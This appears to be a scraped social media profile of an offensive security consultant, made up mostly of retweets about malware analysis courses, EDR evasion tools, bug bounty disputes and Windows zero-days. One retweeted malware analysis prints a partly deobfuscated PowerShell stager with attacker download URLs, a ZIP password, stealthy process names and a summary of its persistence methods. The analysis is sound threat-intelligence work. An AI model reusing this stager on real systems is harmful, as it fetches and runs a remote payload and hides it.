Jus

15 posts

Jus

Jus

@OffsecPierogi

Offensive Security Consultant | Security Researcher | US Army Vet

Katılım Kasım 2025
58 Takip Edilen19 Takipçiler
Jus retweetledi
RussianPanda 🐼 🇺🇦
RussianPanda 🐼 🇺🇦@RussianPanda9xx·
I have been seeing reverse engineering / malware analysis courses that cost thousands of dollars. Do you know you can actually learn that for free, right? There are also a bunch of other courses out there that are way cheaper or even free: - courses.0ffset.net - malwareanalysis-for-hedgehogs.com - invokere.com - github.com/RPISEC/MBE - guyinatuxedo.github.io/index.html - openanalysis.net - p.ost2.fyi - taomm.org
English
20
167
824
120.6K
Jus retweetledi
Abdul Mhanni
Abdul Mhanni@abdo_mhanni·
During an engagement, and in an effort to bypass Crowdstrike, I figured out a new method to locally privilege escalate when having code execution as a Microsoft Virtual account using only a LoLbin(certreq) and some AD-CS magic. I was successfully able to compromise the target with Crowdstrike present without needing to use potatoe class exploits. I wrote a blog about it here! abdulmhsblog.com/posts/iammachi…
English
4
79
368
18.4K
Jus retweetledi
Jus retweetledi
Two Seven One Three
Two Seven One Three@TwoSevenOneT·
New #redteam tool for blocking EDRs: EDRChoker Instead of fully blocking the EDR agents' connections to their server, we can throttle their bandwidth so they consistently time out when sending data, which is effectively the same as blocking but avoids triggering "block" or "drop" packet events #pentest #cybersecurity Github: TwoSevenOneT/EDRChoker
Two Seven One Three tweet mediaTwo Seven One Three tweet mediaTwo Seven One Three tweet media
English
24
180
758
116.2K
Jus retweetledi
unlockParent64
unlockParent64@stop_spammerz·
Another powerShell stager using XOR+hex obfuscation. It downloads a password-protected ZIP from cloud-flare-authenticator[.]link or 193.111.117[.]6, extracts cert.exe, executes it hidden, then establishes persistence via HKCU Run, Startup .lnk, user PATH modification, and a logon scheduled task. Classic multi-persistence loader behavior. Deobfuscated code: $ErrorActionPreference = "Stop"; $ urls = @("hxxps://cloud-flare-authenticator.link/iDXs9HOIpoTLZRE.zip", "http://193.111.117.6/iDXs9HOIpoTLZRE.zip"); $ pw = 'iDXs9HOIpoTLZRE'; $ z = "$env:TEMP\iDXs9HOIpoTLZRE[.]zip"; $ d = "$env:LOCALAPPDATA\cert_update"; $ exe = "$d\iDXs9HOIpoTLZRE.exe"; $ stealthNames = @("SysHostService", "WinLogonHelper", "RuntimeBrokerSvc", "SpoolerSubService") $ appName = $ stealthNames | Get-Random # Downloads ZIP, extracts with 7-Zip/WinRAR, executes payload hidden, # then persists via HKCU Run, Startup .lnk, PATH modification, and scheduled task.
unlockParent64 tweet media
MalwareHunterTeam@malwrhunterteam

Possible interesting opendir: http://cloud-flare-authenticator[.]link/ 🤷‍♂️

English
2
32
180
14.1K
Jus retweetledi
frostb1te
frostb1te@frostb1ten·
For a report I've submit report to MSRC months ago, showed full remote capabilities. MSRC closed saying it's "Local only". I comment: "I showed a 0 click proof of concept here. Why was it closed?" MSRC:" The assessment decision remains unchanged." Me:"Ok but I proved remote with X PoC and you can see the video I've even attached a few months ago that shows it in action" MSRC: " Please feel free to submit a new report with additional details."
English
13
34
341
20.3K
Jus retweetledi
b1ack0wl
b1ack0wl@b1ack0wl·
okay, now tell them that their vulnerability doesn't qualify for a bounty, but then patch it in the next release.
b1ack0wl tweet media
English
16
170
2.9K
48.7K
Jus retweetledi
Daax
Daax@daaximus·
Yeah, nah. Big L for Microslop. Nobody has a moral obligation to hand over their hard earned discoveries for free. Pay up or shut up. You are owed nothing, and you will get nothing by stomping your feet like a petulant child because “[this is] an “unnecessary risk” that forced its security teams to work around the clock, to understand, protect customers and develop patches.” God forbid your people do their jobs and it cost you more money than paying the researcher. Good. I suggest anyone either disclose them publicly to light a fire under Microsoft’s ass or keep them to yourself. Make them feel the pain of not paying out appropriately to save them time. They have pulled the “doesn’t meet servicing criteria” then patch it next update one too many times for valid bugs. RE: cybernews.com/security/micro…
English
10
65
335
12.1K
Jus retweetledi
impulsive
impulsive@weezerOSINT·
Microsoft "patched" a Windows bug in December 2020 that lets a standard user write to protected parts of the system that only SYSTEM should have access to. Basically you can take over the machine from a normal account. I just built the new exploit for it and ran it on my Windows 11 machine. Still works. Over 5 years later.
impulsive tweet media
English
7
87
698
79.7K
Jus retweetledi
vx-underground
vx-underground@vxunderground·
Big news for Blue Team nerds That nerd who released those Microsoft 0days has created two new repos on GitHub with spooky sounding names indicating they will be releasing two new Windows 0days. Very cool github.com/Nightmare-Ecli…
English
35
205
1.8K
73.3K